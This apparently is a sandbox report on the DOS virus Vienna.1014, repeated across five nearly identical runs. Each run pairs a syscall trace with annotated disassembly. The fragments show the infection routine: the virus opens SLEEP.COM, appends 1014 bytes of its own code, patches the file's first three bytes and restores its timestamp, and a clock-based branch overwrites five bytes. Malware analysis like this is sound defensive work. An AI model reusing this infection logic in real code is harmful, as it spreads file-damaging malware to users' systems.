Sample viewer

vx.netlux.org/Virus.DOS.Vienna.1014


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:49:47.438812211Z 47 PC: 12e71 | Get disk transfer address
2018-12-17T22:49:47.440482361Z 26 PC: 12eaa | Set disk transfer address
2018-12-17T22:49:47.441592998Z 78 PC: 12fb9 | Find first file
2018-12-17T22:49:47.447889649Z 67 PC: 12ff1 | Get or set file attributes
2018-12-17T22:49:47.454598949Z 67 PC: 13001 | Get or set file attributes
2018-12-17T22:49:47.468167493Z 61 PC: 1300b | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:49:47.47340198Z 87 PC: 13017 | Get or set file date and time
2018-12-17T22:49:47.475434435Z 44 PC: 13021 | Get time 0x13021: and dh, 7
; Disassembly window following the "Get time" call (PC 13021). The jne below tests
; the flags left by the `and dh, 7` printed at the end of the preceding log line.
; NOTE(review): dh is presumably the seconds value returned by Get time, bx the handle
; of the file opened earlier, and si the base of the code's own data area; none of
; those register loads is visible in this window, so confirm against the full sample.
; Analyst caveat: which path runs depends on the clock, so one sandbox run shows only
; one of the two behaviours below.
0x13024: jne 0x13036                    ; low three bits of dh non-zero -> read path at 0x13036 (taken in this run: the next event is the 3-byte read)
0x13026: mov ah, 0x40                   ; ah = 40h, the write function (op 64 in the trace table)
0x13028: mov cx, 5                      ; length = 5 bytes
0x1302b: mov dx, si
0x1302d: add dx, 0x8a                   ; buffer = si + 0x8a
0x13031: int 0x21                       ; 5-byte write; no seek is logged between the open and this point, so it would presumably land at the start of the file and overwrite it (confirm)
0x13033: jmp 0x130b6                    ; skip the read/seek sequence; 0x130b6 lies outside this window
0x13036: mov ah, 0x3f                   ; ah = 3Fh, the read function (op 63 in the trace table)
0x13038: mov cx, 3                      ; length = 3 bytes
0x1303b: mov dx, 0xa
0x1303e: add dx, si                     ; buffer = si + 0xa
0x13040: int 0x21                       ; logged as "Read 3 bytes on handle 5"
0x13042: jb 0x130b6                     ; carry set = DOS reported an error -> give up on this file
0x13044: cmp ax, 3
0x13047: jne 0x130b6                    ; fewer than 3 bytes read -> give up on this file
0x13049: mov ax, 0x4202                 ; ah = 42h move file pointer, al = 02h: offset is relative to end of file
0x1304c: mov cx, 0
0x1304f: mov dx, 0                      ; cx:dx = 0 -> position exactly at end of file
0x13052: int 0x21                       ; logged as "Move file pointer"; the trace then shows a 1014-byte write, a second seek and a 3-byte write
2018-12-17T22:49:47.477440354Z 63 PC: 13042 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:47.481765111Z 66 PC: 13054 | Move file pointer
2018-12-17T22:49:47.483079323Z 64 PC: 13077 | Write file or device (Write 1014 bytes on handle 5)
2018-12-17T22:49:47.489283379Z 66 PC: 13089 | Move file pointer
2018-12-17T22:49:47.490598178Z 64 PC: 13097 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:47.494891481Z 87 PC: 130a5 | Get or set file date and time
2018-12-17T22:49:47.496900818Z 62 PC: 130a9 | Close file
2018-12-17T22:49:47.502158636Z 67 PC: 130b6 | Get or set file attributes
2018-12-17T22:49:47.508706579Z 42 PC: 130ba | Get date 0x130ba: cmp dh, 0xb
; Disassembly window following the "Get date" call (PC 130ba). The je below tests
; the `cmp dh, 0xb` printed at the end of the preceding log line.
; NOTE(review): DOS Get date returns the month in dh, so this looks like a
; month == 11 check; the call setup itself is outside this window.
0x130bd: je 0x130dd                     ; dh == 0x0b -> alternate branch at 0x130dd (not taken in this run: the next event is the Set DTA call)
0x130bf: push ds                        ; ds is replaced below, keep a copy
0x130c0: mov ah, 0x1a                   ; ah = 1Ah, set disk transfer address (op 26 in the trace table)
0x130c2: mov dx, word ptr [si]
0x130c4: mov ds, word ptr es:[si + 2]   ; ds:dx = far pointer stored at [si] / es:[si+2]
0x130c8: int 0x21                       ; logged as "Set disk transfer address"; presumably puts back the DTA fetched by the first call of the trace (confirm)
0x130ca: pop ds
0x130cb: xor ax, ax
0x130cd: xor bx, bx
0x130cf: xor dx, dx                     ; ax, bx, dx cleared
0x130d1: mov di, 0x100
0x130d4: xor si, si
0x130d6: mov di, 0x100                  ; repeats the load at 0x130d1
0x130d9: push di                        ; 0x100 becomes the return address
0x130da: xor di, di
0x130dc: ret                            ; near return to offset 0x100, the load offset of a .COM image; the next logged event is the string display at PC 12e26, presumably the host program running (confirm)
0x130dd: mov byte ptr [0x470], 0x32     ; target of the je above: stores 0x32 at ds:0x470
0x130e2: nop
0x130e3: mov bx, 0x3f3                  ; window ends here; the rest of this branch is not shown
2018-12-17T22:49:47.511090841Z 26 PC: 130ca | Set disk transfer address
2018-12-17T22:49:47.512292043Z 9 PC: 12e26 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10011,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:26:58.510443976Z 47 PC: 12e71 | Get disk transfer address
2018-12-25T12:26:58.512732273Z 26 PC: 12eaa | Set disk transfer address
2018-12-25T12:26:58.51402311Z 78 PC: 12fb9 | Find first file
2018-12-25T12:26:58.519998513Z 67 PC: 12ff1 | Get or set file attributes
2018-12-25T12:26:58.526653064Z 67 PC: 13001 | Get or set file attributes
2018-12-25T12:26:58.543340732Z 61 PC: 1300b | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:26:58.549770329Z 87 PC: 13017 | Get or set file date and time
2018-12-25T12:26:58.551645271Z 44 PC: 13021 | Get time 0x13021: and dh, 7
; Disassembly window following the "Get time" call (PC 13021). The jne below tests
; the flags left by the `and dh, 7` printed at the end of the preceding log line.
; NOTE(review): dh is presumably the seconds value returned by Get time, bx the handle
; of the file opened earlier, and si the base of the code's own data area; none of
; those register loads is visible in this window, so confirm against the full sample.
; Analyst caveat: which path runs depends on the clock, so one sandbox run shows only
; one of the two behaviours below.
0x13024: jne 0x13036                    ; low three bits of dh non-zero -> read path at 0x13036 (taken in this run: the next event is the 3-byte read)
0x13026: mov ah, 0x40                   ; ah = 40h, the write function (op 64 in the trace table)
0x13028: mov cx, 5                      ; length = 5 bytes
0x1302b: mov dx, si
0x1302d: add dx, 0x8a                   ; buffer = si + 0x8a
0x13031: int 0x21                       ; 5-byte write; no seek is logged between the open and this point, so it would presumably land at the start of the file and overwrite it (confirm)
0x13033: jmp 0x130b6                    ; skip the read/seek sequence; 0x130b6 lies outside this window
0x13036: mov ah, 0x3f                   ; ah = 3Fh, the read function (op 63 in the trace table)
0x13038: mov cx, 3                      ; length = 3 bytes
0x1303b: mov dx, 0xa
0x1303e: add dx, si                     ; buffer = si + 0xa
0x13040: int 0x21                       ; logged as "Read 3 bytes on handle 5"
0x13042: jb 0x130b6                     ; carry set = DOS reported an error -> give up on this file
0x13044: cmp ax, 3
0x13047: jne 0x130b6                    ; fewer than 3 bytes read -> give up on this file
0x13049: mov ax, 0x4202                 ; ah = 42h move file pointer, al = 02h: offset is relative to end of file
0x1304c: mov cx, 0
0x1304f: mov dx, 0                      ; cx:dx = 0 -> position exactly at end of file
0x13052: int 0x21                       ; logged as "Move file pointer"; the trace then shows a 1014-byte write, a second seek and a 3-byte write
2018-12-25T12:26:58.554042224Z 63 PC: 13042 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:26:58.560179456Z 66 PC: 13054 | Move file pointer
2018-12-25T12:26:58.561737623Z 64 PC: 13077 | Write file or device (Write 1014 bytes on handle 5)
2018-12-25T12:26:58.581692136Z 66 PC: 13089 | Move file pointer
2018-12-25T12:26:58.589653979Z 64 PC: 13097 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:26:58.601628815Z 87 PC: 130a5 | Get or set file date and time
2018-12-25T12:26:58.606907733Z 62 PC: 130a9 | Close file
2018-12-25T12:26:58.622396146Z 67 PC: 130b6 | Get or set file attributes
2018-12-25T12:26:58.632690012Z 42 PC: 130ba | Get date 0x130ba: cmp dh, 0xb
; Disassembly window following the "Get date" call (PC 130ba). The je below tests
; the `cmp dh, 0xb` printed at the end of the preceding log line.
; NOTE(review): DOS Get date returns the month in dh, so this looks like a
; month == 11 check; the call setup itself is outside this window.
0x130bd: je 0x130dd                     ; dh == 0x0b -> alternate branch at 0x130dd (not taken in this run: the next event is the Set DTA call)
0x130bf: push ds                        ; ds is replaced below, keep a copy
0x130c0: mov ah, 0x1a                   ; ah = 1Ah, set disk transfer address (op 26 in the trace table)
0x130c2: mov dx, word ptr [si]
0x130c4: mov ds, word ptr es:[si + 2]   ; ds:dx = far pointer stored at [si] / es:[si+2]
0x130c8: int 0x21                       ; logged as "Set disk transfer address"; presumably puts back the DTA fetched by the first call of the trace (confirm)
0x130ca: pop ds
0x130cb: xor ax, ax
0x130cd: xor bx, bx
0x130cf: xor dx, dx                     ; ax, bx, dx cleared
0x130d1: mov di, 0x100
0x130d4: xor si, si
0x130d6: mov di, 0x100                  ; repeats the load at 0x130d1
0x130d9: push di                        ; 0x100 becomes the return address
0x130da: xor di, di
0x130dc: ret                            ; near return to offset 0x100, the load offset of a .COM image; the next logged event is the string display at PC 12e26, presumably the host program running (confirm)
0x130dd: mov byte ptr [0x470], 0x32     ; target of the je above: stores 0x32 at ds:0x470
0x130e2: nop
0x130e3: mov bx, 0x3f3                  ; window ends here; the rest of this branch is not shown
2018-12-25T12:26:58.635854146Z 26 PC: 130ca | Set disk transfer address
2018-12-25T12:26:58.637044746Z 9 PC: 12e26 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10011,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:26:59.256546699Z 47 PC: 12e71 | Get disk transfer address
2018-12-25T12:26:59.258713913Z 26 PC: 12eaa | Set disk transfer address
2018-12-25T12:26:59.260387046Z 78 PC: 12fb9 | Find first file
2018-12-25T12:26:59.266525931Z 67 PC: 12ff1 | Get or set file attributes
2018-12-25T12:26:59.27357919Z 67 PC: 13001 | Get or set file attributes
2018-12-25T12:26:59.290025239Z 61 PC: 1300b | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:26:59.297117849Z 87 PC: 13017 | Get or set file date and time
2018-12-25T12:26:59.299746561Z 44 PC: 13021 | Get time 0x13021: and dh, 7
; Disassembly window following the "Get time" call (PC 13021). The jne below tests
; the flags left by the `and dh, 7` printed at the end of the preceding log line.
; NOTE(review): dh is presumably the seconds value returned by Get time, bx the handle
; of the file opened earlier, and si the base of the code's own data area; none of
; those register loads is visible in this window, so confirm against the full sample.
; Analyst caveat: which path runs depends on the clock, so one sandbox run shows only
; one of the two behaviours below.
0x13024: jne 0x13036                    ; low three bits of dh non-zero -> read path at 0x13036 (taken in this run: the next event is the 3-byte read)
0x13026: mov ah, 0x40                   ; ah = 40h, the write function (op 64 in the trace table)
0x13028: mov cx, 5                      ; length = 5 bytes
0x1302b: mov dx, si
0x1302d: add dx, 0x8a                   ; buffer = si + 0x8a
0x13031: int 0x21                       ; 5-byte write; no seek is logged between the open and this point, so it would presumably land at the start of the file and overwrite it (confirm)
0x13033: jmp 0x130b6                    ; skip the read/seek sequence; 0x130b6 lies outside this window
0x13036: mov ah, 0x3f                   ; ah = 3Fh, the read function (op 63 in the trace table)
0x13038: mov cx, 3                      ; length = 3 bytes
0x1303b: mov dx, 0xa
0x1303e: add dx, si                     ; buffer = si + 0xa
0x13040: int 0x21                       ; logged as "Read 3 bytes on handle 5"
0x13042: jb 0x130b6                     ; carry set = DOS reported an error -> give up on this file
0x13044: cmp ax, 3
0x13047: jne 0x130b6                    ; fewer than 3 bytes read -> give up on this file
0x13049: mov ax, 0x4202                 ; ah = 42h move file pointer, al = 02h: offset is relative to end of file
0x1304c: mov cx, 0
0x1304f: mov dx, 0                      ; cx:dx = 0 -> position exactly at end of file
0x13052: int 0x21                       ; logged as "Move file pointer"; the trace then shows a 1014-byte write, a second seek and a 3-byte write
2018-12-25T12:26:59.310044621Z 63 PC: 13042 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:26:59.317007625Z 66 PC: 13054 | Move file pointer
2018-12-25T12:26:59.3187431Z 64 PC: 13077 | Write file or device (Write 1014 bytes on handle 5)
2018-12-25T12:26:59.331935276Z 66 PC: 13089 | Move file pointer
2018-12-25T12:26:59.333724312Z 64 PC: 13097 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:26:59.344350589Z 87 PC: 130a5 | Get or set file date and time
2018-12-25T12:26:59.346551432Z 62 PC: 130a9 | Close file
2018-12-25T12:26:59.354692327Z 67 PC: 130b6 | Get or set file attributes
2018-12-25T12:26:59.454860019Z 42 PC: 130ba | Get date 0x130ba: cmp dh, 0xb
; Disassembly window following the "Get date" call (PC 130ba). The je below tests
; the `cmp dh, 0xb` printed at the end of the preceding log line.
; NOTE(review): DOS Get date returns the month in dh, so this looks like a
; month == 11 check; the call setup itself is outside this window.
0x130bd: je 0x130dd                     ; dh == 0x0b -> alternate branch at 0x130dd (not taken in this run: the next event is the Set DTA call)
0x130bf: push ds                        ; ds is replaced below, keep a copy
0x130c0: mov ah, 0x1a                   ; ah = 1Ah, set disk transfer address (op 26 in the trace table)
0x130c2: mov dx, word ptr [si]
0x130c4: mov ds, word ptr es:[si + 2]   ; ds:dx = far pointer stored at [si] / es:[si+2]
0x130c8: int 0x21                       ; logged as "Set disk transfer address"; presumably puts back the DTA fetched by the first call of the trace (confirm)
0x130ca: pop ds
0x130cb: xor ax, ax
0x130cd: xor bx, bx
0x130cf: xor dx, dx                     ; ax, bx, dx cleared
0x130d1: mov di, 0x100
0x130d4: xor si, si
0x130d6: mov di, 0x100                  ; repeats the load at 0x130d1
0x130d9: push di                        ; 0x100 becomes the return address
0x130da: xor di, di
0x130dc: ret                            ; near return to offset 0x100, the load offset of a .COM image; the next logged event is the string display at PC 12e26, presumably the host program running (confirm)
0x130dd: mov byte ptr [0x470], 0x32     ; target of the je above: stores 0x32 at ds:0x470
0x130e2: nop
0x130e3: mov bx, 0x3f3                  ; window ends here; the rest of this branch is not shown
2018-12-25T12:26:59.458267775Z 26 PC: 130ca | Set disk transfer address
2018-12-25T12:26:59.459460264Z 9 PC: 12e26 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":7,"TimeBased":true,"OriginalID":10011,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:01.382058781Z 47 PC: 12e71 | Get disk transfer address
2018-12-25T12:27:01.383222981Z 26 PC: 12eaa | Set disk transfer address
2018-12-25T12:27:01.38490499Z 78 PC: 12fb9 | Find first file
2018-12-25T12:27:01.39167291Z 67 PC: 12ff1 | Get or set file attributes
2018-12-25T12:27:01.39794961Z 67 PC: 13001 | Get or set file attributes
2018-12-25T12:27:01.416401233Z 61 PC: 1300b | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:01.423813101Z 87 PC: 13017 | Get or set file date and time
2018-12-25T12:27:01.425338902Z 44 PC: 13021 | Get time 0x13021: and dh, 7
; Disassembly window following the "Get time" call (PC 13021). The jne below tests
; the flags left by the `and dh, 7` printed at the end of the preceding log line.
; NOTE(review): dh is presumably the seconds value returned by Get time, bx the handle
; of the file opened earlier, and si the base of the code's own data area; none of
; those register loads is visible in this window, so confirm against the full sample.
; Analyst caveat: which path runs depends on the clock, so one sandbox run shows only
; one of the two behaviours below.
0x13024: jne 0x13036                    ; low three bits of dh non-zero -> read path at 0x13036 (taken in this run: the next event is the 3-byte read)
0x13026: mov ah, 0x40                   ; ah = 40h, the write function (op 64 in the trace table)
0x13028: mov cx, 5                      ; length = 5 bytes
0x1302b: mov dx, si
0x1302d: add dx, 0x8a                   ; buffer = si + 0x8a
0x13031: int 0x21                       ; 5-byte write; no seek is logged between the open and this point, so it would presumably land at the start of the file and overwrite it (confirm)
0x13033: jmp 0x130b6                    ; skip the read/seek sequence; 0x130b6 lies outside this window
0x13036: mov ah, 0x3f                   ; ah = 3Fh, the read function (op 63 in the trace table)
0x13038: mov cx, 3                      ; length = 3 bytes
0x1303b: mov dx, 0xa
0x1303e: add dx, si                     ; buffer = si + 0xa
0x13040: int 0x21                       ; logged as "Read 3 bytes on handle 5"
0x13042: jb 0x130b6                     ; carry set = DOS reported an error -> give up on this file
0x13044: cmp ax, 3
0x13047: jne 0x130b6                    ; fewer than 3 bytes read -> give up on this file
0x13049: mov ax, 0x4202                 ; ah = 42h move file pointer, al = 02h: offset is relative to end of file
0x1304c: mov cx, 0
0x1304f: mov dx, 0                      ; cx:dx = 0 -> position exactly at end of file
0x13052: int 0x21                       ; logged as "Move file pointer"; the trace then shows a 1014-byte write, a second seek and a 3-byte write
2018-12-25T12:27:01.428722874Z 63 PC: 13042 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:01.43619371Z 66 PC: 13054 | Move file pointer
2018-12-25T12:27:01.437752646Z 64 PC: 13077 | Write file or device (Write 1014 bytes on handle 5)
2018-12-25T12:27:01.447215293Z 66 PC: 13089 | Move file pointer
2018-12-25T12:27:01.448743629Z 64 PC: 13097 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:01.456394777Z 87 PC: 130a5 | Get or set file date and time
2018-12-25T12:27:01.457902663Z 62 PC: 130a9 | Close file
2018-12-25T12:27:01.466580254Z 67 PC: 130b6 | Get or set file attributes
2018-12-25T12:27:01.477559216Z 42 PC: 130ba | Get date 0x130ba: cmp dh, 0xb
; Disassembly window following the "Get date" call (PC 130ba). The je below tests
; the `cmp dh, 0xb` printed at the end of the preceding log line.
; NOTE(review): DOS Get date returns the month in dh, so this looks like a
; month == 11 check; the call setup itself is outside this window.
0x130bd: je 0x130dd                     ; dh == 0x0b -> alternate branch at 0x130dd (not taken in this run: the next event is the Set DTA call)
0x130bf: push ds                        ; ds is replaced below, keep a copy
0x130c0: mov ah, 0x1a                   ; ah = 1Ah, set disk transfer address (op 26 in the trace table)
0x130c2: mov dx, word ptr [si]
0x130c4: mov ds, word ptr es:[si + 2]   ; ds:dx = far pointer stored at [si] / es:[si+2]
0x130c8: int 0x21                       ; logged as "Set disk transfer address"; presumably puts back the DTA fetched by the first call of the trace (confirm)
0x130ca: pop ds
0x130cb: xor ax, ax
0x130cd: xor bx, bx
0x130cf: xor dx, dx                     ; ax, bx, dx cleared
0x130d1: mov di, 0x100
0x130d4: xor si, si
0x130d6: mov di, 0x100                  ; repeats the load at 0x130d1
0x130d9: push di                        ; 0x100 becomes the return address
0x130da: xor di, di
0x130dc: ret                            ; near return to offset 0x100, the load offset of a .COM image; the next logged event is the string display at PC 12e26, presumably the host program running (confirm)
0x130dd: mov byte ptr [0x470], 0x32     ; target of the je above: stores 0x32 at ds:0x470
0x130e2: nop
0x130e3: mov bx, 0x3f3                  ; window ends here; the rest of this branch is not shown
2018-12-25T12:27:01.47998548Z 26 PC: 130ca | Set disk transfer address
2018-12-25T12:27:01.482276235Z 9 PC: 12e26 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":7,"TimeBased":true,"OriginalID":10011,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:01.555090976Z 47 PC: 12e71 | Get disk transfer address
2018-12-25T12:27:01.557700827Z 26 PC: 12eaa | Set disk transfer address
2018-12-25T12:27:01.559019556Z 78 PC: 12fb9 | Find first file
2018-12-25T12:27:01.564992713Z 67 PC: 12ff1 | Get or set file attributes
2018-12-25T12:27:01.571094369Z 67 PC: 13001 | Get or set file attributes
2018-12-25T12:27:01.602802582Z 61 PC: 1300b | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:01.609521335Z 87 PC: 13017 | Get or set file date and time
2018-12-25T12:27:01.611388468Z 44 PC: 13021 | Get time 0x13021: and dh, 7
; Disassembly window following the "Get time" call (PC 13021). The jne below tests
; the flags left by the `and dh, 7` printed at the end of the preceding log line.
; NOTE(review): dh is presumably the seconds value returned by Get time, bx the handle
; of the file opened earlier, and si the base of the code's own data area; none of
; those register loads is visible in this window, so confirm against the full sample.
; Analyst caveat: which path runs depends on the clock, so one sandbox run shows only
; one of the two behaviours below.
0x13024: jne 0x13036                    ; low three bits of dh non-zero -> read path at 0x13036 (taken in this run: the next event is the 3-byte read)
0x13026: mov ah, 0x40                   ; ah = 40h, the write function (op 64 in the trace table)
0x13028: mov cx, 5                      ; length = 5 bytes
0x1302b: mov dx, si
0x1302d: add dx, 0x8a                   ; buffer = si + 0x8a
0x13031: int 0x21                       ; 5-byte write; no seek is logged between the open and this point, so it would presumably land at the start of the file and overwrite it (confirm)
0x13033: jmp 0x130b6                    ; skip the read/seek sequence; 0x130b6 lies outside this window
0x13036: mov ah, 0x3f                   ; ah = 3Fh, the read function (op 63 in the trace table)
0x13038: mov cx, 3                      ; length = 3 bytes
0x1303b: mov dx, 0xa
0x1303e: add dx, si                     ; buffer = si + 0xa
0x13040: int 0x21                       ; logged as "Read 3 bytes on handle 5"
0x13042: jb 0x130b6                     ; carry set = DOS reported an error -> give up on this file
0x13044: cmp ax, 3
0x13047: jne 0x130b6                    ; fewer than 3 bytes read -> give up on this file
0x13049: mov ax, 0x4202                 ; ah = 42h move file pointer, al = 02h: offset is relative to end of file
0x1304c: mov cx, 0
0x1304f: mov dx, 0                      ; cx:dx = 0 -> position exactly at end of file
0x13052: int 0x21                       ; logged as "Move file pointer"; the trace then shows a 1014-byte write, a second seek and a 3-byte write
2018-12-25T12:27:01.613809793Z 63 PC: 13042 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:01.62017343Z 66 PC: 13054 | Move file pointer
2018-12-25T12:27:01.621783531Z 64 PC: 13077 | Write file or device (Write 1014 bytes on handle 5)
2018-12-25T12:27:01.631111082Z 66 PC: 13089 | Move file pointer
2018-12-25T12:27:01.632663005Z 64 PC: 13097 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:01.639506023Z 87 PC: 130a5 | Get or set file date and time
2018-12-25T12:27:01.641942702Z 62 PC: 130a9 | Close file
2018-12-25T12:27:01.649645664Z 67 PC: 130b6 | Get or set file attributes
2018-12-25T12:27:01.659245713Z 42 PC: 130ba | Get date 0x130ba: cmp dh, 0xb
; Disassembly window following the "Get date" call (PC 130ba). The je below tests
; the `cmp dh, 0xb` printed at the end of the preceding log line.
; NOTE(review): DOS Get date returns the month in dh, so this looks like a
; month == 11 check; the call setup itself is outside this window.
0x130bd: je 0x130dd                     ; dh == 0x0b -> alternate branch at 0x130dd (not taken in this run: the next event is the Set DTA call)
0x130bf: push ds                        ; ds is replaced below, keep a copy
0x130c0: mov ah, 0x1a                   ; ah = 1Ah, set disk transfer address (op 26 in the trace table)
0x130c2: mov dx, word ptr [si]
0x130c4: mov ds, word ptr es:[si + 2]   ; ds:dx = far pointer stored at [si] / es:[si+2]
0x130c8: int 0x21                       ; logged as "Set disk transfer address"; presumably puts back the DTA fetched by the first call of the trace (confirm)
0x130ca: pop ds
0x130cb: xor ax, ax
0x130cd: xor bx, bx
0x130cf: xor dx, dx                     ; ax, bx, dx cleared
0x130d1: mov di, 0x100
0x130d4: xor si, si
0x130d6: mov di, 0x100                  ; repeats the load at 0x130d1
0x130d9: push di                        ; 0x100 becomes the return address
0x130da: xor di, di
0x130dc: ret                            ; near return to offset 0x100, the load offset of a .COM image; the next logged event is the string display at PC 12e26, presumably the host program running (confirm)
0x130dd: mov byte ptr [0x470], 0x32     ; target of the je above: stores 0x32 at ds:0x470
0x130e2: nop
0x130e3: mov bx, 0x3f3                  ; window ends here; the rest of this branch is not shown
2018-12-25T12:27:01.662060453Z 26 PC: 130ca | Set disk transfer address
2018-12-25T12:27:01.663430964Z 9 PC: 12e26 | Display string (String= 'Hello - Copyright S & S International, 1990 ')